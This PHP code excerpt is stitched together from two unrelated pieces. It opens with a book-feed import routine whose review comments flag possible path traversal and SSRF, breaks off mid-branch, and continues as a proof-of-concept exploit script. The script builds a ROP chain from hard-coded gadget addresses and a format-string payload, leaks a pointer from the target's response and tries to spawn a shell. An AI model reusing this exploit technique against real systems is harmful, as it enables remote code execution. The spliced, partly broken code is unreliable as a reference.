$book->impressions = 0;
     $book->clicks = 0;
 }
 // Copy each feed column that overwrite() approves onto its Book property.
 // Option key => property name; overwrite() is consulted in this exact order.
 // NOTE(review): the values are copied from $fields unchanged, so whatever later
 // renders title/author/url must escape them for its own output context — confirm.
 $bookColumnMap = [
     't' => 'title',
     'a' => 'author',
     'p' => 'publisher',
     'i' => 'imageUrl',
     'u' => 'url',
 ];
 foreach ($bookColumnMap as $bookOptKey => $bookProp) {
     if (!overwrite($book, $opts, $bookOptKey)) {
         continue;
     }
     // Only the image column is stored with IMG_URL_PREFIX prepended.
     $book->{$bookProp} = ($bookOptKey === 'i')
         ? IMG_URL_PREFIX . $fields[$opts[$bookOptKey]]
         : $fields[$opts[$bookOptKey]];
 }
 // Persist the record, then report it on the console.
 $book->save();
 echo '  [' . $book->title . '] by [' . $book->author . "]\n";
 // Grab the image unless we already have it.
 // Both paths are a constant prefix plus "<sku>.jpg". NOTE(review): $sku is assigned
 // outside this excerpt; if it originates from the imported feed it presumably needs
 // to be limited to a safe character set (no "/" or "..") before it reaches a
 // filesystem path — confirm against the code that sets it.
 $fileName = ORIG_FILE_PREFIX . "{$sku}.jpg";
 $thumbName = THUMB_PREFIX . "{$sku}.jpg";
 if (file_exists($fileName)) {
     // An original with this name is already on disk, so no download is attempted.
     $haveFile = true;
 } else {
     $haveFile = false;
     // NOTE(review): the URL fetched is whatever $book->imageUrl holds at this point;
     // which schemes and hosts util_fetchUrl() accepts is not visible here — confirm
     // that feed data cannot point it at internal services or local files.
     $img = util_fetchUrl($book->imageUrl);
     // A strict false is treated as the failure signal; any other result enters the write branch.
     if ($img !== false) {
         // Dump the image to a file ("w" truncates an existing file).
         // NOTE(review): the fopen() result is not checked on this line; the rest of
         // this branch lies outside the excerpt.
         $file = fopen($fileName, "w");
// NOTE(review): excerpt of a proof-of-concept script. $leak_str, $stack_pivot_1,
// $trampoline_offset, trigger() and overwrite() are defined outside this excerpt,
// so the target and the delivery path are not visible here.
// First payload: used to leak a pointer and also to store the ROP chain.
// Every chain entry is a hard-coded 32-bit value packed with pack("L"), so the chain
// presumably matches one specific build loaded at a fixed address; a rebuilt or
// position-independent, randomised binary would not line up with these constants.
$payload_1 = $leak_str . "XXXX" . $stack_pivot_1 . pack("L", 0x80f0bb7) . pack("L", 0x814491f) . pack("L", 0x806266d) . pack("L", 0x84891fd) . pack("L", 0x807114c) . pack("L", 0xfffffff5) . pack("L", 0x81818de) . pack("L", 0x81b5faa);
// int 0x80 (presumably describes the final chain entry above)
// Second payload: used to trigger the exploit once we've patched everything.
// It is built from printf-style conversion specifiers, which suggests the underlying
// flaw is caller-supplied data reaching a format string — TODO confirm.
$payload_2 = "XXXX" . "XXXX" . "X" . str_repeat("%d", 13) . "%Z";
// trigger the exploit
// Stage 1: leak a pointer
echo "> Attempting to leak a pointer\n";
$data = trigger($payload_1);
// The leaked value is read out of the target's own response: the text after the
// first "w00t" marker is parsed as hex, then $trampoline_offset is added.
$trampoline_ptr = (int) hexdec(explode("w00t", $data)[1]) + $trampoline_offset;
echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n";
// If there are any null bytes or percent signs in the pointer, it will break
// the -0x10 will be applied later, so do it now too
// NOTE(review): the first needle is an empty string in this copy although the comment
// above speaks of null bytes — presumably a character lost in extraction; confirm
// against the original before relying on this check.
if (strpos(pack("L", $trampoline_ptr - 0x10), "") !== false || strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) {
    echo "> That pointer has a bad character in it\n";
    echo "> This won't work.  Bailing out... :(\n";
    // NOTE(review): the bail-out path exits with status 0.
    exit(0);
}
// Stage 2: write the computed pointers into the stored payload
echo "> Overwriting payload with calculated offsets\n";
// prepare the trampoline
// code looks kinda like...
//   mov eax, [eax+0x10]
//   mov eax, [eax+0x54]
//   call eax
// The -0x10 and -0x54 adjustments below mirror the two displacements in that sequence.
overwrite(2, pack("L", $trampoline_ptr - 0x10), 0);
overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset);
// Stage 3: exploit
echo "> Attempting to pop a shell\n";
trigger($payload_2);
// if we make it here, something didn't work
echo "> Exploit failed :(\n";